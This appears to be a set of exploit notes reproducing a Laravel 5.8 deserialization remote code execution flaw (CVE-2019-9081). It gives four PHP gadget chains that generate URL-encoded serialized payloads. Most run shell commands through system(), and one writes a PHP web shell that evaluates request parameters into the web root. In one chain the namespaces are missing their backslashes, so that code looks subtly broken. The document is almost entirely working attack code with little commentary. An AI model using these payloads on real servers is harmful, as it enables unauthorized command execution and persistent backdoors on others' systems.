pop1
Illuminate\Broadcasting\PendingBroadcast->__destruct()
Faker\Generator->__call()
Faker\Generator->format()
Faker\Generator->getFormatter()
<?php
namespace Illuminate\Broadcasting{
class PendingBroadcast
{
private $dispatch;
public function __construct($events, $event)
{
$this->event = $event;
$this->events = $events;
}
}
}
namespace Faker{
class Generator
{
protected $formatters = array();
public function __construct($formatters)
{
$this->formatters = $formatters;
}
}
}
namespace {
$b = new Faker\Generator(['dispatch'=>'system']);
$a = new Illuminate\Broadcasting\PendingBroadcast($b, 'dir');
echo urlencode(serialize($a));
}写shell
PhpOption\LazyOption->option()
<?php
namespace Illuminate\Broadcasting{
class PendingBroadcast
{
public function __construct($events, $event)
{
$this->event = $event;
$this->events = $events;
}
}
}
namespace Faker{
class Generator
{
protected $formatters = array();
public function __construct($formatters)
{
$this->formatters = $formatters;
}
}
}
namespace PhpOption {
final class LazyOption
{
private $callback;
private $arguments;
public function __construct($callback, array $arguments = [])
{
$this->callback = $callback;
$this->arguments = $arguments;
}
}
}
namespace {
$c = new PhpOption\LazyOption('file_put_contents', ['D:\xampp\htdocs\Laravel58\public\shell.php', '<?php eval($_REQUEST[\'cmd\']); ?>']);
$b = new Faker\Generator(['dispatch'=>[$c, 'filter']]);
$a = new Illuminate\Broadcasting\PendingBroadcast($b, 1);
echo urlencode(serialize($a));
}pop2
Illuminate\Broadcasting\PendingBroadcast->__destruct()
IlluminateBus\Dispatcher->dispatch()
IlluminateBus\Dispatcher->commandShouldBeQueued()
IlluminateBus\Dispatcher->dispatchToQueue()
``
<?php
namespace IlluminateBus{
class Dispatcher{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace IlluminateEvents{
class CallQueuedListener{
protected $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace IlluminateBroadcasting{
class PendingBroadcast{
protected $events;
protected $event;
public function __construct($events, $event)
{
$this->events = $events;
$this->event = $event;
}
}
}
namespace PhpOption{
final class LazyOption{
private $callback;
private $arguments;
private $option;
public function __construct($callback, $arguments, $option)
{
$this->callback = $callback;
$this->arguments = $arguments;
$this->option = $option;
}
}
}
namespace{
$c = new PhpOptionLazyOption('system', array('id'), null);
$d = new IlluminateEventsCallQueuedListener('id');
$b = new IlluminateBusDispatcher(array($c, 'filter'));
$a = new IlluminateBroadcastingPendingBroadcast($b, $d);
echo urlencode(serialize($a));
}
pop3
Illuminate\Broadcasting\PendingBroadcast->__destruct()
Illuminate\Validation\Validator->call()
Illuminate\Validation\Validator->callExtension()
<?php
namespace Illuminate\Broadcasting{
class PendingBroadcast{
protected $events;
protected $event;
public function __construct($events, $event)
{
$this->events = $events;
$this->event = $event;
}
}
}
namespace Illuminate\Validation{
class Validator{
public $extensions = [];
public function __construct($extension)
{
$this->extensions = $extension;
}
}
}
namespace{
$b = new Illuminate\Validation\Validator(array(''=>'system'));
$a = new Illuminate\Broadcasting\PendingBroadcast($b, 'dir');
echo urlencode(serialize($a));
}pop4
Laravel v5.8 反序列化rce (CVE-2019-9081) 复现
<?php
namespace Illuminate\Foundation\Testing{
class PendingCommand{
public $test;
protected $command;
protected $parameters;
public function __construct($command, $parameters, $test)
{
$this->command = $command;
$this->parameters = $parameters;
$this->test = $test;
}
}
}
namespace Faker{
class DefaultGenerator{
protected $default;
public function __construct($default = null)
{
$this->default = $default;
}
}
}
namespace{
$b = new Faker\DefaultGenerator(['0'=>'1']);
$a = new Illuminate\Foundation\Testing\PendingCommand('system', ['dir'], $b);
echo urlencode(serialize($a));
}